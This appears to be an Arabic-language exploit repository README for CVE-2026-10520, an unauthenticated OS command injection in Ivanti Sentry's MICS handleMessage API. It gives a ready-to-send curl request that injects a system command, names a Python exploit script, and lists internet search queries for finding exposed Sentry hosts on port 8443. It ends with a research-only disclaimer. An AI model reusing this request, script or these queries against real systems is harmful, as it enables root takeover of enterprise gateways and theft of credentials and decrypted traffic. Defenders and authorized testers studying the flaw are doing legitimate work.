
RCE على مستوى الجذر عبر حقن أوامر نظام التشغيل في Ivanti Sentry
إيفانتي سينتري (المعروف سابقًا باسم MobileIron Sentry) هو بوابة أمنية للمؤسسات تقوم بوكالة حركة المرور بين الأجهزة المحمولة وموارد الخلفية المؤسسية: البريد الإلكتروني وSharePoint وتطبيقات الويب الداخلية. يفرض سياسات إدارة الأجهزة المحمولة (MDM)، وينهي جلسات الأجهزة المحمولة المشفرة، ويصدر مصادقة تعتمد على الشهادات لنشر التطبيقات المؤسسية. عادةً ما تكون مثيلات Sentry مواجهة للإنترنت على المنفذ 8443، مما يعرض واجهة برمجة تطبيقات إدارة MICS (خدمة تكوين Mobile Iron).
CVE-2026-10520 هي ثغرة حقن أوامر نظام التشغيل غير مصادق عليها تؤثر على Ivanti Sentry قبل الإصدارات R10.5.2 وR10.6.2 وR10.7.1 (CVSSv3.1: 10 حرج، مدرجة في CISA KEV). يقع الخلل في نقطة نهاية MICS API /mics/api/v2/sentry/mics-config/handleMessage، والتي تقبل أوامر النظام المغلفة بـ XML عبر جسم message مشفر بعنوان URL دون أي مصادقة أو التحقق من صحة المدخلات. يمكن للمهاجم الذي يصل إلى نقطة نهاية ضعيفة تنفيذ أوامر نظام تشغيل عشوائية كـ ، والحصول على سيطرة كاملة على المضيف — بما في ذلك حركة مرور المؤسسة المفكوكة، وبيانات الاعتماد المخزنة، وجميع بيانات الأجهزة المحمولة المدارة.
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443هذا المستودع ومحتوياته متوفرة حصريًا لأغراض البحث الأمني المشروع، واختبار الاختراق المصرح به، والدراسة التعليمية، والأغراض الدفاعية. من خلال الوصول إلى هذه المواد أو استخدامها، فإنك تقر بالمسؤولية الكاملة عن ضمان امتثال أنشطتك لجميع القوانين المعمول بها وأنك حصلت على الإذن المناسب قبل اختبار أو تطبيق هذه التقنيات على أي نظام لا تملكه.
لا يتحمل مؤلفو هذا المشروع والمشرفون عليه أي مسؤولية عن أي أضرار أو عواقب قانونية أو سوء استخدام ناتج عن تطبيق هذه المعلومات. أي استخدام للوصول غير المصرح به أو النشاط الضار أو الأغراض غير القانونية محظور صراحة وغير مدعوم.
استخدم بمسؤولية. ابق قانونيًا. اختبر فقط ما تملكه أو لديك إذن كتابي صريح لاختباره.
SCT-PL